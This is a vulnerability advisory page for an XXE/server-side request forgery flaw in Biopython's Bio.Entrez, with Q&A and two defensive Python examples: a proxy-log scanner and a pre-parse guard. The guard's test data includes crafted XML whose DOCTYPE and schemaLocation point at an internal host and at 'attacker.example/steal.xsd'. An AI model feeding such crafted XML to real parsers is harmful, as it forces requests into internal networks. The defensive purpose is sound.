CVE-2025-68463
XXE Vulnerability in Biopython Bio.Entrez Through
Publication date: 2025-12-18
Last updated on: 2026-04-22
Assigner: MITRE
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| biopython | biopython | From 3.13.1 (inc) to 3.13.11 (inc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-68463 affects Bio.Entrez, the Biopython module that parses the XML returned by NCBI's E-utilities. Its parser resolves a document's external DTD and XSD references on demand by fetching them over HTTP, and the location it fetches is taken from the document itself: the SYSTEM identifier in the DOCTYPE declaration, or the URL in an xsi:schemaLocation attribute. Anyone who can supply XML to Bio.Entrez.read or Bio.Entrez.parse can therefore make the parsing host issue HTTP GET requests to a URL of their choosing. This is an XML External Entity (XXE) weakness that manifests as server-side request forgery (SSRF): the requests can reach hosts on the internal network that the attacker cannot reach directly, and forcing many such requests can tie up the parser and cause a denial of service. [1]
How can this vulnerability impact me?
If your application feeds XML that did not come directly from NCBI into Bio.Entrez (for example files uploaded by users or obtained from a third party), an attacker can use it for server-side request forgery: the parsing host issues GET requests to internal network resources the attacker could not reach directly. Forcing many such fetches can also degrade or stall the service (denial of service). Because the DTD and XSD fetches are not required to use TLS, an on-path attacker could substitute a definition file (man-in-the-middle), and since fetched definitions are cached a substituted file can persist (cache poisoning); the advisory treats these as secondary to the SSRF. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The vulnerable path is only reached when the parser meets an external DTD or XSD reference it has to fetch, so the signal to look for is a host running Biopython making outbound HTTP GET requests for .dtd or .xsd files to destinations other than NCBI, or over plaintext HTTP, around the time it parses XML. Capture or review egress traffic from those hosts (tcpdump or Wireshark on the host, or proxy and firewall logs) and correlate it with XML parsing activity. The advisory's demonstration script (biopython_doctype_xxe_demo.py) can confirm whether an installed version is affected. The resources do not give specific commands. [1]
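The log review described above, as an added example that is not part of the advisory or of Biopython: it scans egress-proxy log lines for DTD/XSD fetches that go to a non-NCBI host or travel over plaintext HTTP. The log lines, the line format parsed by `parse_line`, and the allowlisted NCBI hosts are constructed assumptions; adapt `parse_line` to your proxy's actual format.

```python
from urllib.parse import urlparse

# Constructed egress-proxy log (not from the advisory). Fields: timestamp,
# client, method, URL, status, user agent. Real proxy formats differ.
SAMPLE_LOG = """\
2025-12-19T10:02:11Z 10.0.1.25 GET https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=brca1 200 Python-urllib/3.12
2025-12-19T10:02:12Z 10.0.1.25 GET https://eutils.ncbi.nlm.nih.gov/eutils/dtd/20060628/esearch.dtd 200 Python-urllib/3.12
2025-12-19T10:07:40Z 10.0.1.25 GET http://10.0.0.5:8080/internal.dtd 200 Python-urllib/3.12
2025-12-19T10:07:41Z 10.0.1.25 GET http://attacker.example/steal.xsd 404 Python-urllib/3.12
2025-12-19T10:08:02Z 10.0.1.30 GET http://www.ncbi.nlm.nih.gov/dtd/esearch.dtd 200 Python-urllib/3.12
"""

# Assumed allowlist: NCBI hosts that legitimately serve DTD/XSD files.
ALLOWED_HOSTS = {"www.ncbi.nlm.nih.gov", "eutils.ncbi.nlm.nih.gov", "dtd.nlm.nih.gov"}
SCHEMA_SUFFIXES = (".dtd", ".xsd")


def parse_line(line):
    """Split one constructed log line into its fields (user agent may contain spaces)."""
    timestamp, client, method, url, status, agent = line.split(None, 5)
    return {"timestamp": timestamp, "client": client, "method": method,
            "url": url, "status": status, "agent": agent}


def classify(entry):
    """Return a reason string when the request is a suspicious schema fetch, else None.
    Only .dtd/.xsd paths are considered; everything else is ordinary E-utilities traffic."""
    parts = urlparse(entry["url"])
    if not parts.path.lower().endswith(SCHEMA_SUFFIXES):
        return None
    if parts.hostname not in ALLOWED_HOSTS:
        return "schema fetch from non-NCBI host"   # the SSRF/XXE signal
    if parts.scheme != "https":
        return "schema fetch over plaintext HTTP"  # the MITM/cache-poisoning signal
    return None


def detect_schema_fetches(log_text):
    """Run classify over every log line; return (client, url, reason) findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        reason = classify(entry)
        if reason:
            findings.append((entry["client"], entry["url"], reason))
    return findings


if __name__ == "__main__":
    for client, url, reason in detect_schema_fetches(SAMPLE_LOG):
        print(f"{client} -> {url}: {reason}")
```

Two of the three findings on the sample log are the internal host and the attacker host; the third is a legitimate NCBI DTD fetched over plain HTTP, which is worth a lower-severity alert of its own. The same two conditions (non-NCBI destination, plaintext scheme) are the ones to encode in a capture filter or SIEM rule if you work from packet captures rather than proxy logs.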
What immediate steps should I take to mitigate this vulnerability?
Upgrade to a Biopython release that includes the fix for this CVE. Until you can, do not pass XML from untrusted sources to Bio.Entrez; where that is unavoidable, screen the input before parsing so that no DOCTYPE SYSTEM identifier or xsi:schemaLocation that points anywhere other than NCBI reaches the parser. At the network level, restrict outbound HTTP from hosts running Biopython to the NCBI hosts they need, which blocks the SSRF requests even if a malicious document gets through. Enforcing TLS on the DTD/XSD fetches addresses the secondary man-in-the-middle and cache-poisoning risks, but the SSRF/XXE issue is the one to fix first. [1]
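The fetch-on-demand behaviour the explanation above describes, and the pre-parse screening the mitigation calls for, as an added example that is not from the advisory or from Biopython. It uses the standard-library expat parser to record every external reference (the DTD named in DOCTYPE, and any xsi:schemaLocation URL) that a fetch-on-demand parser would be asked to resolve, without fetching anything. `resolve_fetch_url` is a model of the vulnerable resolution step, not Biopython's code; the three sample documents, `ALLOWED_HOSTS` and `DEFAULT_DTD_BASE` are constructed assumptions.

```python
import xml.parsers.expat
from urllib.parse import urlparse

# Constructed sample documents (not taken from the advisory or from NCBI).
# A normal E-utilities reply names its DTD with an absolute https URL on NCBI.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE eSearchResult PUBLIC "-//NLM//DTD esearch 20060628//EN"
  "https://eutils.ncbi.nlm.nih.gov/eutils/dtd/20060628/esearch.dtd">
<eSearchResult><Count>1</Count></eSearchResult>
"""
# Attacker-supplied reply: the SYSTEM identifier points at an internal host.
MALICIOUS_DTD_XML = b"""<?xml version="1.0"?>
<!DOCTYPE eSearchResult SYSTEM "http://10.0.0.5:8080/internal.dtd">
<eSearchResult><Count>0</Count></eSearchResult>
"""
# The same primitive through the XSD channel: xsi:schemaLocation off-site.
MALICIOUS_XSD_XML = b"""<?xml version="1.0"?>
<eFetchResult xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="urn:example http://attacker.example/steal.xsd">
<Count>0</Count></eFetchResult>
"""

# Assumptions for the hardened check: NCBI hosts that legitimately serve
# DTD/XSD files, and the base URL used to complete a bare DTD file name.
ALLOWED_HOSTS = {"www.ncbi.nlm.nih.gov", "eutils.ncbi.nlm.nih.gov", "dtd.nlm.nih.gov"}
DEFAULT_DTD_BASE = "https://www.ncbi.nlm.nih.gov/dtd/"


def collect_external_refs(xml_bytes):
    """Record every external resource a fetch-on-demand parser would be asked
    to resolve: the DTD named in DOCTYPE (expat reports it as an external
    parameter entity) and each location in an xsi:schemaLocation attribute.
    Nothing is fetched; the handler only records the identifier."""
    refs = {"dtd": [], "xsd": []}
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_entity(context, base, system_id, public_id):
        refs["dtd"].append(system_id)
        return 1  # report "handled" so expat carries on without loading the DTD

    def on_start_element(name, attrs):
        location = attrs.get("xsi:schemaLocation")
        if location:
            # schemaLocation is whitespace-separated (namespace, URL) pairs
            refs["xsd"].extend(location.split()[1::2])

    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start_element
    parser.Parse(xml_bytes, True)
    return refs


def resolve_fetch_url(system_id, base=DEFAULT_DTD_BASE):
    """Model of the vulnerable resolution step (a model, not Biopython's code):
    an absolute http/https/ftp identifier is requested verbatim and a bare file
    name is joined onto the NCBI base. The document author controls system_id,
    so they control the request target; that is the SSRF primitive."""
    scheme = urlparse(system_id).scheme
    if scheme in ("http", "https", "ftp"):
        return system_id
    if scheme == "":
        return base.rstrip("/") + "/" + system_id.lstrip("/")
    raise ValueError(f"unexpected URL scheme in {system_id!r}")


def guard_external_refs(xml_bytes, allowed_hosts=ALLOWED_HOSTS):
    """Pre-parse check for untrusted XML: every DTD/XSD reference must be an
    https URL on an allowlisted NCBI host, otherwise raise before the document
    reaches a parser that would fetch. Returns the URLs that would be fetched
    when the document is acceptable."""
    refs = collect_external_refs(xml_bytes)
    urls = [resolve_fetch_url(s) for s in refs["dtd"]] + refs["xsd"]
    for url in urls:
        parts = urlparse(url)
        if parts.scheme != "https" or parts.hostname not in allowed_hosts:
            raise ValueError(f"refusing to parse: external reference to {url}")
    return urls


def is_safe_to_parse(xml_bytes):
    """Boolean form of guard_external_refs, for callers that only need a gate
    in front of Bio.Entrez.read / Bio.Entrez.parse."""
    try:
        guard_external_refs(xml_bytes)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_XML), ("dtd", MALICIOUS_DTD_XML),
                       ("xsd", MALICIOUS_XSD_XML)]:
        refs = collect_external_refs(doc)
        would_fetch = [resolve_fetch_url(s) for s in refs["dtd"]] + refs["xsd"]
        print(label, "would fetch:", would_fetch, "safe:", is_safe_to_parse(doc))
```

The guard runs a full expat pass over the document before the real parse, so it costs one extra parse; that is acceptable for E-utilities responses, which are small. Requiring https as well as an allowlisted host is what closes the secondary man-in-the-middle and cache-poisoning concern, since a plain-http DTD reference to a legitimate NCBI host is still rejected. Pair it with egress filtering: the guard stops malicious documents you receive, the network rule stops any fetch that slips past it.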